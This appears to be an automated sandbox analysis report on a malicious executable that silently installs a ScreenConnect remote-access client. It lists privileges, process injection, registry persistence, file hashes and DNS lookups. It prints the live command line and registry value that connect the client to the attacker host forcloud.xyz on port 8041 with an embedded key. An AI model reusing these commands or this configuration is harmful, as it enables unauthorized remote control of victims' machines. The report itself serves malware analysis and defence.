Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3504 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 4920 wrote to memory of 3504 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4636 wrote to memory of 608 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
PID 4636 wrote to memory of 608 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3B3FA75DA6090FA1D6B10FDD8DC4666D C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240633250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C50216D1B5C8D9063CE30DF11C96E2E2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E8B38A38F3824AA6F607D57AD88FD9CE E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "14beaf0b-de62-47f8-a1ec-9c03318254ed" "User"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp

Files

memory/2944-0-0x0000000074F0E000-0x0000000074F0F000-memory.dmp

memory/2944-1-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2944-2-0x0000000005AC0000-0x0000000005DB4000-memory.dmp

memory/2944-3-0x00000000056F0000-0x000000000577C000-memory.dmp

memory/2944-4-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-5-0x0000000005790000-0x00000000057B2000-memory.dmp

memory/2944-6-0x00000000057C0000-0x000000000596A000-memory.dmp

memory/2944-7-0x0000000006370000-0x0000000006914000-memory.dmp

memory/2944-8-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-9-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-14-0x0000000074F00000-0x00000000756B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

MD5 6ebb0b130daf468e91c095bf931388cb
SHA1 c503cd29966246a33d6b8196c4788e4d83dffa09
SHA256 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0
SHA512 e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0

memory/2944-12-0x0000000074F00000-0x00000000756B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp

MD5 845b0569d54305e62c6e8ffe198d217c
SHA1 cd06c3d1554fe08099ada4f4448a23a6422e6234
SHA256 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e
SHA512 af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\Microsoft.Deployment.WindowsInstaller.dll

MD5 5ef88919012e4a3d8a1e2955dc8c8d81
SHA1 c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA256 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA512 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

memory/1740-42-0x0000000004E80000-0x0000000004EAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.InstallerActions.dll

MD5 9260afe4bbde2549fc0b92f657c2e50a
SHA1 5580778a62b06d7b56d3f788727514551de31647
SHA256 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135
SHA512 afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Core.dll

MD5 3b1ba4bebefdc8a95b0f2f0b4e50c527
SHA1 15551d2e8bfb829f3a96d161b43de820c0d417ce
SHA256 a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29
SHA512 f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7

memory/1740-50-0x0000000004F60000-0x0000000004FEC000-memory.dmp

memory/1740-46-0x0000000004EC0000-0x0000000004ECC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Windows.dll

MD5 d196174cf03f86c8776e717f07d5d19f
SHA1 bbd2c6a59229b3e4ec7c5742248f3f55a61dd216
SHA256 a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264
SHA512 cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b

memory/1740-54-0x00000000051A0000-0x000000000534A000-memory.dmp

C:\Windows\Installer\MSIFD1E.tmp

MD5 ba84dd4e0c1408828ccc1de09f585eda
SHA1 e8e10065d479f8f591b9885ea8487bc673301298
SHA256 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

\??\Volume{f0eec59f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{291c9575-6640-4619-ba6c-8ec19e9d8a84}_OnDiskSnapshotProp

MD5 6c3b76d02689c675d382e84056fa8e44
SHA1 13e56afc104e3b727cc8a8783aa1937898807480
SHA256 069a40b27b68d6a6458742f1faa61688bf464126ebfd28d95a9c263723d3b9d4
SHA512 68428e9ce1e52449fa3fe50f6a3baf02dedb94f9c20d51091cd5b50252ea425508a187e66043134c6c114b4c5e23edd4ee2c614d2595609beab40651949b22c7

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 b887328d115c752911f6e990fba7b6f5
SHA1 8e1e3444a3f30085409d261732d11407bfa93bb3
SHA256 93ea2a8758fcff1dab55ed1b96dbf82764e40e8e2b2d67788c640a227ae1fe94
SHA512 f7a86a21d3f86bdb638d92652af24f30a9d36d8d4c34e0df096e4ac4cdf8b63aa40cec714ee4bbed9f4e0fee405da8ae43d2f52db4bb4c3e06c9a53fca6ad06d

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

MD5 826314610d9e854477b08666330940b5
SHA1 65b601d60042cf6f263cd38ac2f63cd06a9de159
SHA256 e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9
SHA512 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

MD5 3ff07c657068430ef677181d1f67066d
SHA1 37f7e9d2ccb65b4ea2733393015635ea1b43393e
SHA256 d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1
SHA512 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095

memory/4636-120-0x00000000017E0000-0x00000000017F8000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

MD5 095c85acc658f0733bc6941163ec234c
SHA1 298c53608e02cac620702cb6abe75c70560c03b1
SHA256 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11
SHA512 fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

MD5 f7f74a2053a7c858ed989f07f81b9720
SHA1 dc585c95c643e7a6b3cbb63a080e660ffebbc7b9
SHA256 fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2
SHA512 fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043

memory/4636-131-0x0000000003FA0000-0x0000000003FF0000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

MD5 f311a8217807f6c85817058522e234a2
SHA1 ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1
SHA256 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9
SHA512 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039

memory/4636-135-0x0000000003FF0000-0x0000000004026000-memory.dmp

memory/4636-136-0x00000000042B0000-0x0000000004342000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

MD5 5adcb5ae1a1690be69fd22bdf3c2db60
SHA1 09a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256 a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

memory/4636-138-0x0000000004210000-0x0000000004251000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

MD5 be74ab7a848a2450a06de33d3026f59e
SHA1 21568dcb44df019f9faf049d6676a829323c601e
SHA256 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA512 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

memory/4636-140-0x0000000004490000-0x0000000004562000-memory.dmp

C:\Config.Msi\e57fbb6.rbs

MD5 6d4e03c4e249f0a09b6aa7f4141a7ae5
SHA1 7690405857a223e93b04ade1772ef67b98ae2023
SHA256 ebb09f4dd5bd12386d89c3953cb1b2523e27a3a90ff893d983b3fd3dd24dfa9e
SHA512 258879157eb40695006f5192074db8843b6eddf767f0da07a1ebc1388d0d48084ed7b200968b4c2467d09939a7b7831f19c2cda722cf1ffcee733cc05c4c96a3

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

MD5 511202ed0ba32d7f09eab394c917d067
SHA1 dbd611720fd1730198f72dec09e8e23e6d6488f8
SHA256 f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d
SHA512 f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

MD5 5cd580b22da0c33ec6730b10a6c74932
SHA1 0b6bded7936178d80841b289769c6ff0c8eead2d
SHA256 de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512 c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

MD5 ab5fa8d90645878d587f386d0e276c02
SHA1 a602a20735a1104851f293965f1fe4ab678bf627
SHA256 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16
SHA512 a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config

MD5 728175e20ffbceb46760bb5e1112f38b
SHA1 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512 fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

memory/608-161-0x0000000000440000-0x00000000004D6000-memory.dmp

memory/608-162-0x0000000002580000-0x00000000025B6000-memory.dmp

memory/608-164-0x000000001B5D0000-0x000000001B77A000-memory.dmp

memory/608-163-0x000000001B390000-0x000000001B41C000-memory.dmp

memory/608-165-0x000000001C830000-0x000000001C9B6000-memory.dmp

memory/608-167-0x00000000025E0000-0x00000000025F8000-memory.dmp

memory/608-166-0x0000000002540000-0x0000000002558000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 17:06

Reported

2024-11-13 17:09

Platform

win7-20241010-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

Signatures

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAypwQqMSE80C7%2b83r5rB%2b5gAAAAACAAAAAAAQZgAAAAEAACAAAABz4llyKSKGXC4YC%2fhQUax1llOlyRp%2blcVdz46qHXpeLwAAAAAOgAAAAAIAACAAAADNXL9uItJ%2bMAk6l%2fxXe%2bbp8Dr94qV2kbvt3ErotkWmpaAEAABinbUxWPE81CWNx51hgVbSFx%2bNrzPyEJmsZrZF%2ftli5MW6BU%2frvmpwxl2uM%2bMgDHk4R%2fJHPjbi9mUig%2f4kuZkPMKFGJ9eUhzIk7MX5jipaJQ05HvQoVTtZy09%2bpdaKFmSsaC6lwqu1kottT5spMqUmannrWG%2ff8qpTwakvtmn3Aobppjyfk%2ba5Vk69WYb3727Tov%2fd0AqAl9E5%2bsYUW%2f74lNMtl8Am9G%2famNccxEGDGBo%2b8Vfu1G8YowJUYTypMxSV%2bEYAq%2b147T%2bMvyn6b106LSTLHBw7T%2bH7KQPwm35iiDN80HJWgJ8nxqoLSyJ2Tt34btAkUncyO27uHIEcB4r%2bejxY924y7VGSxavYq0F8XQjaX7hnigWYHLgKsR714w6Wy%2b0uoeKjAIGMA0Y28RN4Sdyr9v%2fklSOat9v3lV8gmcuLaEvbEj68cTEBd2gbcZlNjlBJP6xdXzDuLcwcdTTBfMOoniDaqEnYv0fefGtNtpWDIhHzqA0efBH9tVtrb3Q1lykXhj0aezk4rMRxdrOuiK6kFKOzpE4HHb3p7bpUWIcX2SpRfLzS1vWIQDZ0Pr2QVeZqEcuwBULecurFDnoyJIJBAwJ3YFJKuy45lKQ4t3GiW9gQ%2bz2FV5LJpPKo5u%2fgOatFzL8XEa2dlhjNctVMTnVZst%2bo%2fS3bldTtXW1JflxRUcktD1UBESTNnYzy19gf4vDBsQU730UPrMtPmz5MgOs6H%2b4AHoMhciX7V2FqBv5IAS7P0rOYbywh4j9KGRPKOHDpPmSF%2fnrBiDHIcZ6VMONcTbjCUvfsM1t7jUgpzSyqrDJR%2b%2bXNueg2Z2z%2frRtlehaM3VKEVWF9%2bxtkiCjR4SpYucyj8tT%2bV5S0%2bpxjMYBgtRa191RcjfydxZjR9ei6z2Rdx3qOoJnJFNVw8HKPneCYY1yX7IPu1orSR%2fSJg1VB3nsiLonSSTyKBbCFniY%2f2h%2brZTFVGn7TSLWhRJ4ncHvhdZB%2bZy8SkB29MpoduZ9B4El1%2fR5CPBQ5wIvbEcHhFeDRbvYwes1YjsPuxq8s5clcoK%2bG9ExleDI6gBc%2fAMj2orTyuIgaH8KTxi19x8DuhGpVf0BCFQPnsSGMhxsRIKjI835wR4AEY8i9vFX8MPeTuvUbPJQnnOJLXgA12bErawhrXUoZEUNqxMb4XZcy3lnVV5hzgoxouPD4BqOM%2bAB7avFqDx3bX82aHFeGFshhi9W5d1Qc9%2bADDK3VVWdMUAsuSyXeHYoUxHE2ZEyEcRvEsFd1nfNlbSCsJzPDM69L2z4siDSV2rxHGWeXSePLOOY7AekjTtYwNiy1073ySHDUX7WFnNdoW5ZYxkdPuGLhycYFVLFI8VFWUDk07Bc1eE%2bQhxy4TuN%2fbnugM6o4LIfka0VvpQJm9KnmTsVCk3FdgUrw1u%2fkkxYaj1bO6hgWpPvbHcj46vYecRZ%2f%2f7iPOVxaZrgEVBiOy3fMXP8st%2bc9ivOYICQmZ%2fQfF9e4GJJHBeWdCTLdYP%2bTS4uuxahNmuodMJuKvdw5o0m3587TBqVWyc6ANM30ztAPUY65dWo1v%2bFeWHbMcTBBxba5f2zUEUAAAAB2xS%2bAWDmhx2U